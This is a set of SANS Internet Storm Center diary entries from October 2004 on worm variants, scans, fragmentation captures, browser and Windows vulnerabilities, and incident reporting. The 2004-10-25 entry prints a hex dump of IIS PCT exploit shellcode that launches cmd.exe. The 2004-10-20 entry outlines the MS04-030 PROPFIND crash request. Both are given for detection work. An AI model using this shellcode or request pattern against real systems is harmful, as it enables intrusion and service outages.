Published: 2004-10-31

SCANS, Babel (not Bagel/Bagle/Beagle) & Halloween


Port 53 scans are up a bit. Please submit any details of the activity if you're seeing it.


Who is looking for Apples for Halloween?
Scans directed at Port 548 are also up a bit, and in the United States during the celebration of Halloween (Trick or Treat!) it's not looked upon favorably if Apples have worms ( ; ^ ) (just to clarify the previous statement, it is an attempt at humor, there is no evidence that there's a worm out to eat Apple systems).

Taking a look for published vulns;


Select "Associated Vulnerabilities:"

Scans for Port 3306 are interesting and a bit more aggressive by a relatively few systems.

Taking a look for published vulns;

Select "Associated Vulnerabilities:"


Readers submitted information covering a wide range of issues. Some aspects of responding to Diary Readers submissions of malware and the recent flurry of unique Bagle/Beagle definitions by each AV vendor amplify the need to support (in all ways possible) developing efforts to establish a common framework to expedite responses to outbreaks of malware.

McAfee AVERT (Anti-Virus Emergency Response Team), which has a great site (link below), has graciously shared the following information which is used here as a recent sample of the "Tower of Babel" problem;

What AVERT calls Bagle.BB:
Kaspersky I-Worm.Bagle.at
Symantec W32.Beagle@mm!cpl
CA Win32/Bagle.AQ.CPL.Worm

What AVERT calls Bagle.BC:
Kaspersky I-Worm.Bagle.au
Symantec W32.Beagle.AU@mm
CA Win32/Bagle.AP.Worm

What AVERT calls Bagle.BD:
Kaspersky I-Worm.Bagle.au
Symantec W32.Beagle.AW@mm
CA Win32/Bagle.AQ.Worm

Having a common framework may also help differentiate why one vendor labels something a trojan and another vendor labels the same file a threat, and it would certainly help those whose resources do not allow for the use of "potentially unwanted", "threat" or "expanded threat" detection solutions.

The McAfee AVERT Website is at;

An effort related to solving one aspect of the Tower of Babel issue and that (imho) deserves widespread user support is the VGrep effort, which is "currently maintained by Dmitry Gryaznov, Senior Manager, Advanced Security Research, McAfee Security" and was "originally created by Ian Whalley". So if you use the site, please support it by giving the operators feedback on your use of it. Thanks gentlemen!

"About VGrep"
'That which we call a rose, By any other name would smell as sweet.'
-- Shakespeare, Romeo and Juliet
Anyone who has had any experience of the anti-virus world will know that a single virus can have several different names - anti-virus vendors are not obliged to conform to any naming conventions, nor do they tend to do so.

VGrep is a system designed to help clear up some of the confusion surrounding the naming of viruses. It works by running scanners across a large collection of virus-infected files, and parsing their output into a simple text database."

In Summary, any efforts on your part to support developing initiatives in this area or that encourage your AV Vendor, the Open Source Community, Microsoft or interested elected officials and government agencies to accomplish something in this arena will pay tangible benefits to you in the future. And don't forget, this is one situation where you can vote twice or more. Vote with your wallet.


We thank you for the information!

One submission was for an email that lead to a a "Postcard from the Edge". The report (and analysis of the malware) was of a website that is actively exploiting visitors using vulnerable browsers. The analysis and samples of malware were from reader Erik van Straten, who investigated a malicious email that he received directing the user to a webserver where they would read a postcard sent to them. It is apparent that the server has been active for more than 2 weeks and it has been reported. Thanks very much for the work Kevin! A portion of the exploit has been identified as exploit.CodeBaseExec and a description is here;


AV vendors whose applications identified another component labelled it W32/Helodor.A@bd by F-Prot, Trojan.Win32.Helodor.gen by Kaspersky, Trj/Helodor.B by Panda and Backdoor.Guzu by Symantec. At this time the only available write-up that I could access was here;


Phan Mail

We appreciate it!

Patrick Nolan

Support ACK to Pedro Bueno! Thanks!


Published: 2004-10-30

More Fragmentation; What is Normal Part II

More Fragmentation

We have more reports of UDP fragmentation that appears to be very much related. David Tulo has provided us with some good observations from his first captures that is he seeing:

1. The packet length is 64 bytes.

2. The IPID appears random.

3. The Fragment Offset is always 64.

4. TTL is always 52.

5. The IP Header Checksum is valid.

6. The source port is always 4591 (11EF).

7. The destination port is always 53.

8. The length is always 25

9. The DNS ID is always 29175(71F7).

10. The packet has bits set for:

A. DNS Query

B. Recursion Desired

C. 1 Question

11. However... no DNS question is ever asked.

We received another capture from Ian Marks showing the same fragmentation pattern. Here are a couple of more observations from the traffic. The more fragments bit is not set and the first fragment appears not to have been sent as neither captures contained it. The data portion between the two were identical except bytes 7 and 8 of the data were changing in both of them but very similar between the two captures.

We are still very much interested in seeing more captures of similar traffic. Also, if you notice any other activity at the time that may pertain to this, please let us know.

What is Normal Part II

We would like to thank the readers for all the great input! We received many tips on how they identify a baseline for their systems and for finding what should not be there. Here are some of the comments that we received:

John Franolich:

To know what processes are running on a machine, I create a baseline of the ports / processes running when the box first gets built. For example, I fport it out to a text file and keep the file offline. Any program will do fine besides fport, choose your flavor. Then I can compare it later. Of course it is not going to prevent a exe from being wrapped, or not showing up in the tasks list at all, but it is a good start and allow a person to get a gut feeling about a box. Typically on a box that has been taken by scripts I'll see extra spool processes running etc.

Frank Adams

On my windows PCs, monitoring whats normal, I tend to use a program that has a process monitor combined with a port egress monitor called Port Explorer, by Diamond Computer Systems...You get a good sense of what's normal traffic and what isnt very quickly with it on a system since you see exactly which service or program is sending packets across which ports to what address. The only downside is that it really helps to know what should be running, what address(es) the program or service sends packets to, and what shouldn't be running.

Brandon Enright

What I do now is enter comment into Process Explorer for all known services. I built one XP machine and one 2000 machine fresh and commented just about every executable from a base install to fully patched. I turned on all the services and commented all those processes. Then I installed as much “spyware” as possible and commented all those process. Now when I sit down at a machine and see new processes and programs each one that isn’t glaringly obvious gets a quick google search. New drivers and driver helpers and other programs get commented as good while new malware gets commented simply as malware or as it’s viral name. The most common comments are something like “VIRUS (Gaobot)” or “Spyware” or “Anti-Virus (Norton)” or “Good (Dell WiFi Driver). Since Process Explorer stores the absolute path, not just the executable name these comments are generally very reliable...It now has over 2200 documented Processes.
Happy Halloween Everyone!!

Lorna Hutcheson

Handler on Duty



Published: 2004-10-29

New Bagle/Beagle Variants, Fragmentation Attacks, Gmail XSS Hole

New Bagle/Beagle variants on the loose

We received many reports of a new Bagle/Beagle worm variant seen in the wild today. Be sure to update your anti-virus signatures, if you haven't done so already.

It seems that there are actually three different variants out there, but they exhibit similar characteristics: they spread via email and P2P networks, listen on TCP port 81, and attempt downloading files from pre-defined web servers.

We received a couple of reports of systems initiating outbound connections on TCP port 81. According to one of these reports (thanks, Mark!), the systems were infected with an older Bagle variant (Beagle.AI, according to McAfee), which is a bit strange. If you've witnessed outbound connections on TCP port 81, please send us your packet traces.

As far as I know, the file that the worm attempts retrieving from the remote servers is currently not present on any of the servers. One theory (thanks, Vern!) is that the worm may be connecting to remote web servers via HTTP in order to register itself with the server's access or error logs, giving the author a list of infected systems so that he or she can then access them via inbound TCP port 81 connections.

The naming of these variants is inconsistent across vendors. I wish anti-virus vendors could agree on the taxonomy, as having different names generates a lot of confusion among anti-virus software users. As far as I can tell, the following names refer to the same variant:

Bagle.AV (Sophos, Symantec)

Bagle.AQ (Computer Associates, Norman)

Bagle.BB (McAfee)

Bagle.BC (Panda)

Bagle.AP, Beagle.AT (F-Secure)

Bagle.AT (Kaspersky, TrendMicro)

The following names seem to refer to a slightly different variant:

Bagle.BC (McAfee)

Bagle.AU (Symantec)

Yet another variant carries the following names:

Beagle.AW (Symantec)

Bagle.AR (Computer Associates)

Bagle.BD (McAfee)

Secunia offers a page with links to several vendors' descriptions of today's Bagle/Beagle variants:


Have you witnessed fragmentation attacks recently?

A bit less than two weeks ago we received a report of a fragmentation attack targeting two unrelated financial services organizations. We'd like to understand that attack better. Here are a few log entries that document the attack :

Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.59:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.

Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.12:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.

FW-1: OPSEC Oct 15, 7:58pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 63039 len 0 offset 0) - 5 fragments dropped during the last 60 seconds

FW-1: OPSEC Oct 15, 7:57pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 2629 len 0 offset 0) - 4 fragments dropped during the last 60 seconds

If you've recently witnessed fragmentation attacks of this nature, please send us the relevant packet captures or log entries.

An XSS hole reported in Gmail

According to a Nana NetLife Magazine report, there is a cross-site scripting (XSS) vulnerability in Gmail, Google's webmail service. The flaw allows an attacker to steal a Gmail user's authentication cookie, providing access to the victim's account without having to know the password. The article states that Google is in the process of addressing the problem:


XSS issues are present in many, many web applications. Unfortunately, many organizations are not set up to prevent XSS flaws during the software development cycle, and are quick to dismiss XSS vulnerabilities as being unreasonably difficult to exploit. In reality, the execution of XSS attacks is often not very challenging, and the exposure can be significant.

The iDefense paper "The Evolution of Cross-Site Scripting Attacks" provides an excellent overview of XSS-related issues. You can access it at the following URL; the site requires (free) registration:


Lenny Zeltser

ISC Handler of the Day



Published: 2004-10-28

URGENT: New version of Beagle hitting


There appears to be a new Beagle on the loose. According to the information on Symantecs Security Response Page it opens a backdoor on port 81. It creates a file with a variant of the name wingo in the executable name, adds a wingo.exe in the Registry Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
and attempts to disable anti-virus and security software and block the websites.

Lenny will continue to update in the next diary.
Deb Hale
Handler on Duty


Published: 2004-10-27

Issues with MS04-032 patch / Phishings, Spams and Virus story

Issues with MS04-032 patch

We received a report about issues regarding the post installation of Security Update for Microsoft Windows (840987), released by Microsoft on October 12 under Microsoft Security Bulletin MS04-032, on Windows 2000 workstations.

The issue, according the user, is that after the instalation of MS04-032 patch, the 16-bit applications will stop to work properly. Also, he found out that some services were dying without any explained reasons.

As a workaround to have his applications to work again, he had to take the following steps:

-For WIN2K, Log in as local administrator. The local administrator is
best for this; not a domain admin who has local admin privileges.

-Uninstall MS04-032 (KB840987) from the system. Allow it to reboot

-After reboot, log back in as local administrator. This will allow
the uninstall to finish.

-We have encountered problems if the second login is not completed by
a local administrator.

-Test the 16-bit apps and/or print functions, all should be good.

-Reboot one last time.

We would like to hear if you had similar problems, and if you found workarounds for it.

Another Follow-up on how to identify "normal" processes on Windows

A user also sent a site to be included as reference of Lorna´s Diary ( http://isc.sans.org/diary.php?date=2004-10-24 ) . The site is Process Library, at http://www.processlibrary.com/ .

Phishings, Spams and Virus

I am sure that you are all tired to hear about phihings and its dangerous, but I would like to tell one more history. Today I received a phishing spam from a well-known online greeting cards website. This one was really well created and every link pointed to the real website, and there were two links really close each other. The first one was "click here to see your card" and the other was " or click here to enter the website and put your card reference code". The first one was a link to download a password stealers targeting some Brazilian Banks, which is detected only by 4 on 10 AV vendors, according VirusTotal. Which is really not good...

As a FYI, on its Packed form, it was only detected by 2 in 10, and in its Zipped form, by 2 in 10, and finally, on its .exe form, by 4 in 10...


Handler on Duty: Pedro Bueno ( pbueno /AT/ isc.sans.org )


Published: 2004-10-25

Port 2000 spike; New IIS PCT exploit?; Following the bouncing MS patches

Port 2000 spike

There is a significant increase in port 2000 activity. Given the number
of targets, this appears to general sweeping. At this point, we don't
have a good feeling for what is causing this increase. If you have some
packet captures, send them along.


New IIS PCT exploit in the wild?

We received a report that a possibly new IIS PCT exploit (for MS04-011)
is being used in the wild. Exploit code for this vulnerability has been
known to exist as early as April 2004, so this NOT a new vulnerability.
This packet capture appears to have 25 extra bytes beginning at offset
0x0E0 below. At this time, we have not been able to determine whether
this is completely new, but it should be identified by most IDS
signatures given the obvious strings "THCOWNZIIS!" and "cmd.exe", which
were also in the original exploit code.

000 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
020 BE 98 EB 25 96 AA 46 DA 69 4E 02 06 6C 59 6C 59 ...%..F.iN..lYlY
030 F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0A0 E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0B0 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0C0 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0D0 FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0E0 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02 P.E.5.....E.f.E.
0F0 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53 f5..f.E.X..1.SSS
100 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55 SVFV....UXf.0j.U
110 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC W.U..E.P.U.UU.U.
120 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\cmd
130 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2 .1..E..WWWSS....
140 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10 R..ExP.E.P..SSj.
150 FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4 ..RSSSU.U.j..U.

Following the bouncing MS patches

While Tom Liston is busy working on the next installation of "bouncing
malware", here is an interesting story about misbehaving software.

Several weeks ago, a concerned reader submitted an interesting case to
ISC suspecting a new virus or system compromise. Harpal Parmar reported
that a Windows 2000 server running SP4 and fully patched was sending
unsolicited packets outbound to specific addresses in the IP range:
128.x.x.x -- 136.x.x.x.

The traffic was sending normal TCP packets to random destination hosts
in the above range on TCP port 139 every 10 minutes. Fortunately,
Harpal had outbound filtering in place so the packets never made it to
their destination. Upon not receiving a response, the server would
retransmit the TCP segments using the normal backoff timing of TCP (3,
6, and 12 second intervals).

ISC handlers reviewed a packet capture provided by Harpal and found no
evidence of malware or system compromise. So after utilizing several
different virus scanners and discovering no malware, Harpal looked for
different alternatives as the source cause. The first step was to
rebuild the server offline and monitor for outbound traffic. After
applying a specific patch, MS04-011 (KB835732), the activity started
again. Indeed, this patch was confirmed to be the source of the
problem after being investigated by an engineer at Microsoft. Another
patch was provided by Microsoft that corrected the problem.

Apparently, the operating system was looking for the SYSVOL$ folder on a
domain controller and a bug was causing the IP address to be obtained
from random memory addresses.

Specific symptoms experienced:

o Windows 2000 SP4

o Dual processor machine (x86)

o IIS installed/enabled

o File and printer sharing disabled

o Outbound connections to TCP port 139 every 10 minutes in IP range: 128.x.x.x -- 136.x.x.x


o Problem caused by application of MS04-011 (KB835732)

o Problem fixed by workaround or patch available at:


Follow-up on Fake RedHat Advisory

The k-otik folks have an analysis of the bad things that might happen
if you follow the instructions in the fake RedHat advisory that was
reported in yesterday's diary:

Follow-up on how to identify "normal" processes on Windows

A couple of additional URLs that may be useful when trying to to
identify good/bad processes in Windows. Please note that these sites
are hosted by companies with commercial products. This is not an
endorsement of any commercial products by SANS or the Internet Storm
Center (isn't it fun to be politically correct?).




Published: 2004-10-24

What is Normal? Fake RedHat Advisory; JPEG Repair Utility

What is Normal?

We received an email today from Dan Messmer asking about what were the "good services and processes for WinXP and Win2K". It is an excellent question and got me to thinking about how many times we all look for the "abnormal" things without even being sure of what is normal for a system to begin with. How many times have we all sat down to look at a system and what processes and services were running and wondered what something was? This led to some good suggestions that I would like to share with everyone.

It is important to realize that malware can hide itself and not show up as a running process if you are using Task Manager. If you suspect something is going on, make sure and pay close attention to the spelling since many times malware can use services and processes that are spelled almost identical to the valid ones. My tool of choice for looking at processes is using Process Explorer from Sysinternals. It will show you everything and gives you much more information about every process. Fellow handler Patrick Nolan had this recommendation: "In addition to Process Explorer, using the latest version of Autoruns from SysInternals allows you to show Services, select Views - enable Show Services and then enable Hide Microsoft Signed Entries. For the remaining
entries you can now highlight one and right click to Google it."

Another good approach was given by Handler Marc Sachs: "If you routinely check for suspicious computers and have a fairly baselined set of systems here's another approach. Set up a "control" computer that is configured like all of the other ones on your network but don't let anybody use it as a workstation. This computer has the same OS, same patches, same software, etc. Take a look at the running processes, memory allocations, and other metrics on your control computer when examining a suspected computer. The control machine could also be a virtual machine running in VMWare or VirtualPC, it doesn't have to be a separate box."

In addition to the above recommendations, here are some sites that will help you go through your services for what are valid Microsoft services.

For W2K:
For XP:

Here is another site that folks have written in recommending in response to this diary entry and is a good site to have bookmarked:
If you know of other techniques or tools for recognizing what is normal for any operating system, please let us know.

Fake RedHat Advisory

We have reports of a fake RedHat advisory from Craig Small that is being circulated. One of our handlers also received one of these. The site was taken down on 23 October, however it is a good reminder that even though most of these are aimed at Windows users, always be suspect when receiving an email asking you to download something.

JPEG Repair Utility

Another user passed along a good tool for finding and repairing JPEG files that have been modified using the MS04-028 exploit. The link to this tool is
Lorna J. Hutcheson

Handler on Duty



Published: 2004-10-23

Yahoo's Code Verification; Prevalent of Malcodes; Hidden File Finding Problem in XP Pro and Home

Yahoo's Code Verification

One reader reported to us that he received a strange email in his yahoo mailbox. It has a link which redirect to http://help.yahoo.com/help/edit/context/context-02.html.

At the same time, it will call up a pop up from asking you to enter the code based on a given image.

We have some preliminary analysis on this. If you also experienced receiving such emails before, do let us know. We will like to correlate with our findings.
Prevalent of Malcodes

There are a few readers informing us on malcodes. One of them detected one when they saw a significant increase in port 445 traffic within their network, which subsequently was discovered as a new variant of Sdbot worm. Malcodes have been so prevalent nowadays that antivirus vendors have been playing catch up game. Some of them attempt to exploit known Windows vulnerabilities in order to spread. Patching will help to prevent infection from such worms. Of course not forgetting running a proper configured personal firewall will also help to protect your system.

This also demonstrated the important of constant monitoring of your logs. Early detection of abnormal network traffic will help you to reduce the damage should there be a worm attack.
Hidden File Finding Problem in XP Pro and Home (Contributed by Patrick Nolan)

With Simple File Sharing available on XP there are some "circumstances" caused by Microsoft's design that can result in Hidden Files remaining hidden unless you start the system in Safe Mode (and I'm not addressing the possibility of Trojaned command line tool here). These circumstances have occurred on system compromises reported to the ISC.

FWIW, "Simple File Sharing is always turned on in Windows XP Home Edition-based computers. By default, the Simple File Sharing UI is turned on in Windows XP Professional-based computers that are joined to a workgroup. Windows XP Professional-based computers that are joined to a domain use only the classic file sharing and security interface." (Link A below). Even if you're connected to a Domain, check the setting.

To View these "circumstantially" Hidden Files in Safe Mode:

For Windows XP Professional using the NTFS File System on a Workgroup or Standalone Computer, the Simple File Sharing setting can be viewed and turned on and off in Windows Explorer, under Tools, Folder Options Click the View tab, scroll to the bottom of the Advanced Settings list and clear the "Use simple file sharing (Recommended)" check box. Then restart the system using Safe Mode, log on as Administrator, and use your favorite commands to find the hidden files/s. If the command executable you use has not been trojaned you'll find the hidden files.

For Windows XP Home Edition Using the NTFS File System restart the computer using Safe mode, "Simple File Sharing is automatically turned off when you run the computer in Safe mode." (Link B below). Log on as Administrator, and use your favorite commands to find the hidden files/s. If the the command executable you use has not been trojaned you'll find the hidden files.

A: How to configure file sharing in Windows XP (MS provides a WMP video too)


B: How to Gain Access to the System Volume Information Folder


"Circumstances" - see Windows® XP Under the Hood By Brian Knittel

Publisher : Que
Pub Date : July 30, 2002
ISBN : 0-7897-2733-1
Pages : 736


Published: 2004-10-22

GDI+ exploit mutation lessons and How to (not) report an attack to a large organization

GDI+ exploit mutations and how it re-teaches an old lesson

In September they announced the JPEG buffer overflow in gdiplus.dll. Again, it was a case where data became code. Although there are scanners to determine if your dlls are vulnerable (see http://isc.sans.org/gdiscan.php ) the issue remains: a file that was once considered a safe data file is now potentially executable code. This happened before when email became active code thanks mainly to MS Outlook. How many Outlook vulnerabilities have we had to deal with? This has also happened with other multimedia files (e.g. winamp buffer overflows.)

There have already been a few variant proofs-of-concept released. In response, there are SNORT rules circulating to detect these exploit attempts. There are folks playing around with the code in order to evade those signatures ( http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html ) and I suppose there will be new signatures developed to catch the new versions.

If you read that last paragraph alone (and ignore the URL link,) it could have been written about any vulnerability. JPEG vulnerabilities are not going to end with patches to gdiplus.dll—it’s a new family of vulnerabilities.

It’s not a new discovery, but it is an important lesson. Once data has the potential to be executed as code, it has to be inspected. There’s really no reason to inspect a file differently because of its extension. Even compressed files should be inspected in raw and uncompressed form.
How to (Not) report an attack by a large company

While at the day job, interesting things come across my desk. Recently it was an email from a distraught webmaster complaining that my firm was attacking his simple web-forum. Normally, I contact the complainant, do a big of log searching, and solve the issue. This time I wasn’t able to help, we’ll see why below.

What to do if your website is under “attack”:

Firstly not everyone knows what an attack is, and not everyone agrees upon the threshold that determines an attack from “popularity.” I’m going to avoid that debate and simply say, it’s an attack worth reporting if you’re impacted enough to take the time to identify and report it. But how do you report it and not pull your hair out (or shoot yourself in the foot) in the process?

Gather logs. You’ll need them to prove to the ISP, webmaster, SANS handler, etc. that the event happened. If you don’t have logs, you will not get help. Instead, you will get requests for logs.

Now that you have your logs, and your case written, you need a sympathetic ear to complain to. Although WHOIS records are going to give you contacts, do not rely on them-- especially if it’s a large organization that owns them. Large organizations have lots of departments. And the guys running the DNS server (the likely technical contacts of the domain) aren’t in the security team. So when you send your report, feel free to include all of the WHOIS contacts, technical, and administrative, for the domain and the IP net-block. Also be sure to use the abuse@ address which is required by RFC 2142. A visit to the organization’s web page may offer other contacts as well. The key is to try all of those contacts at the same time. You don’t want to add delay and added frustration by sending email to the WHOIS contact and have it ignored.

Most importantly, in wording your report/request for help, the absolutely last thing you want to do is threaten retaliation or legal action. You are understandably upset when you have to sift through gigs of weblogs and research an incident from a firm that you expect to “be secure” or “play nicely,” but threatening the organization is not going to solve your problem any faster. In fact, it’s going to delay things.

This is why I couldn’t help the webmaster who needed it. Once he mentioned lawsuit, I had to cease all communications with him, and direct everything through the legal department. That adds months to the resolution process. Which can take years off of your life and hairline.

To recap, when dealing with any organization, large or small, you’ll want the logs handy for when they request them, you’ll want to shotgun your message across as many of the public contacts as you can find (in moderation—don’t email their employee list, :-P) and be nice to your first contact.

Kevin Liston
kliston at greenman-consulting dot com


Published: 2004-10-21

How To Report A BotNet, Glitch In The Matrix?, Bouncing Malware -IS- In The Works

How To Report A Botnet

Over the past several days, we've been asking readers to report to us information on botnets and botnet controllers. One thing that we've noticed is that there is a wide range of "value" to the information that we're getting. So we thought it would be a good idea to give some guidance about what kind of information we need.

Please give us *complete* information. We need information that will allow us to substantially confirm the "charges" that you're making. Hey... it's not that we don't trust you, but you're asking us to get machines shut down, and before we're going to try to do that, we're going to want to check things out for ourselves. (OK, so perhaps it really IS that we don't trust you. Just don't take it personally: we're professionally paranoid.) Beyond the IP address of the machine that you believe is acting as a bot controller, we need to know the port that the control channel is running on. Lately, we've been seeing many of these controllers running IRC on non-standard ports. Also, if you can give us any information on the channel or nicks being used, that would be incredibly helpful. (A suggestion: if it's within your power to reboot a machine infected with a bot, if you monitor connections as it reboots, you'll likely see channel connection information.)

Best of all is to only turn to us after you've attempted to get the machine shut down yourself. What?!? Is the ISC shirking its duty? Naaaaah. We really do try to work on everything that gets reported to us. However, there are only about 30 of us, so sometimes we get stretched a little thin.

Courtesy of ISC Handler Pedro Bueno, here are some tips for becoming a Do-It-Yourself incident handler:

1) If you have the IP address of the botnet controller you could try to send an
email to the security/abuse address at the responsible ISP to report it. A whois tool will help you to identify the ISP responsible for that IP address. On a Unix-like system, the command "whois" can give you this information: whois <Botnet-IP-Address>.

On Windows, if you don't have a whois client, you can use one of the whois web-based services to look up the information, ie "GeekTools" at
http://www.geektools.com/whois.php . Remember to be specific in the information that you provide, and BE POLITE.

2) If you don't receive any information or acknowledgment from the ISP, or if you don't want to make the initial contact yourself, you could do the initial leg-work and then send the information that you've gathered to the ISC using our contact form ( http://isc.sans.org/contact.php ). Please pass along the WHOIS information on the ISP that you found, and if possible the "AS" number of the ISP. The Cymru Whois server, can provide this information, so you'll need to point your WHOIS client at whois.cymru.com.

3) If, for whatever reason, you don't want to use the whois servers/services above, or don't want to contact the ISP, or if you don't seem to be getting anywhere, then please inform us through the ISC contact form. Be sure to list the IP address and the port number that the botnet is using, any channel/nick/password information you may have, and if you believe that it is currently active.

(Thanks Pedro!)

Glitch In The Matrix?

Have a feeling of Deja Vu? ISC Handler Ed Skoudis has documented some strangeness with Microsoft's Windows Update. It seems as though the folks in Redmond changed things for a bit today. When visiting Windows Update, rather than scanning your system to show if you were current with patches, WU presented visitors with the following:

Thank you for your interest in Windows Update
Windows Update is the online extension of Microsoft Windows
that helps you get the most out of your computer.
Follow these steps to access Windows Update through the
Help and support Center:
* Click Start, and then click Help and support.
* If you are running Windows XP, click Keep your computer
up-to-date with Windows Update.
* If you are running a Windows Server 2003 family product,
click Windows Update.

According to Ed, things are back to normal now.

Usually, we would all just nod a lot and say "Sure, Ed..." (Remember: "Professional Paranoia") but he actually trotted out some screen caps to prove his point. So, did anyone else notice this?

UPDATE: A reader has written in confirming exactly what Ed saw. We never really doubted you, Ed ;-)

Bouncing Malware III Actually *IS* In the Works

I've gotten several requests from readers wanting to know when "Follow The Bouncing Malware, Part III" will be out. I've been working on it, but please realize that analyzing just one of the MANY malware samples takes several hours, so writing each of the installments is very, VERY time consuming (even if I didn't have other things to do ;-). Please be patient for a little while longer.

(Be nice to "cousin" Kevin...)


Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-10-20

Browser Vulnerabilities (all browsers), MS04-030 and -032 POC exploit released

Vulnerable Browser Day

If you are reading this diary with any web browser other then 'lynx' or 'wget', you are likely vulnerable to one of the issues released today. The first issue
covers all browsers that support tabbed browsing (Firefox, Netscape, Opera,
Konqueror...). The second issue is only of interest to Microsoft Internet Explorer users.

(1) Tabbed Browsing Dialog Spoofing

A malicious website may display a dialog box above a "trusted" site, after the user clicked on a link directing them from the malicious site to the trusted site. The user has to open the new site in a new tab. For a quick test, see:





(non available right now. We will update this space as they become available).
(2) Two vulnerabilities in MSIE

The first vulnerability is a modified "drag&drop" exploit. The original problem
was fixed with this months patches. But this version is still working.

The second vulnerability will allow malicious web pages to bypass the security zone restrictions, using crafted .hhk files (Windows Help Index).

We are not aware for any patches for either vulnerability. However, you can
avoid these vulnerabilities by disabling Active Scripting. See:


for details.

MS04-030 POC

A proof-of-concept (POC) exploit for MS04-030 has been made available. The exploit, a perl
script, claims to trigger the DOS condition. While we are still working to
verify the exploit, here some signatures to look for:

The exploit will send the following header:

(the 'Host' field will hold the IP address of the attacked host. In this
example, we used '')


Content-type: text/xml
Content-length: 188963

<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:z1="xml:" xmlns:z2="xml:" xmlns:z3="xml:" xmlns

(... repeating 'xmlns:z???="xml:", where '???' keeps incrementing ...)

xmlns:z9995="xml:" xmlns:z9996="xml:" xmlns:z9997="xml:"
xmlns:z9998="xml:" >

For Apache servers, the exploit will leave the following log entries:

Access Log: - - [20/Oct/2004:14:57:15 +0000] "PROPFIND / HTTP/1.1" 400 31
"-" "-"
Error Log:

[Wed Oct 20 14:57:15 2004] [error] [client] request failed:
error reading the headers

(your apache install may use a different log format)
If working "as advertised", the exploit will crash unpatched IIS servers.
MS04-032 Windows XP Metafile Overflow POC

Looks like the kids are finally catching up with all the MSFT vulnerabilities
released this month. A POC (proof-of-concept) exploit was released to exploit
the Windows XP Metafile overflow vulnerability.

The malicious file will start a remote shell or connect back to a URL.

This functionality goes beyond what is typically considered a 'proof-of-concept' as it allows full remote control to the system with all the privileges of the user that opened the image.
The good thing is that some AV vendors already detect it:
From VirusTotal website:

BitDefender 7.0 10.20.2004 Exploit.FPSE.A

Sybari 7.5.1314 10.20.2004 Exploit-MS03-051

Symantec 8.0 10.19.2004 Trojan.Moo

The Manager's Briefing at http://isc.sans.org/presentations/MS04Oct.ppt has been updated to reflect the existence of these exploits.


Pedro Bueno, Johannes Ullrich.


Published: 2004-10-19

Multiple anti-virus software evasion

Multiple Anti-virus software evasion

Anti-virus software from McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV are known to be vulnerable to an evasion attack where the attacker is able to craft a compressed file (zip) with malicious code and evade the scanning by anti-virus software.

The problem is caused by incorrect handling of header information within the zip file. Some anti-virus software would skip the scan for files that has zero size as indicated by the header. The header size information does not affect the decompression of the zip file.
Reference: http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true
Keep chasing Botnets

We have received numerous submissions of Botnets and we are working with authorities to shut them down. Thanks to all who have submitted info to us. If you have any info on Botnets, feel free to send it in.


Jason Lam, jason /AT/ networksec.org


Published: 2004-10-18

Backbone issues?

Backbone issues?

18-Oct-2004 21:00 UTC:

We have had several reports of intermittent ISP level latency and "slowness" issues which we believe may be related to what is being reported as a "backbone outage causing routing instability and packet loss" at Level 3. The problems appear to be centered in the U.S. Northeast. We do not currently have any solid information on the cause or the time-frame for a solution, but Level 3 is aware of the issue and actively working to fix it. We wanted to give our readers a "heads-up": If you are experiencing slow connections, it may not be your imagination. We will post additional information if and when it becomes available.

19-0ct-2004 14:00 UTC:

We have received forwarded reports that the issues with Level 3 were centered within their Washington DC area point of presence. These issues caused a cascading effect both within Level 3 and with other providers and ISPs who pulled BGP sessions with Level 3 to contain the problem. At this time, most issues should have been resolved with the possible exception of sites/ISPs within the DC area itself that are using Level 3 as a provider.

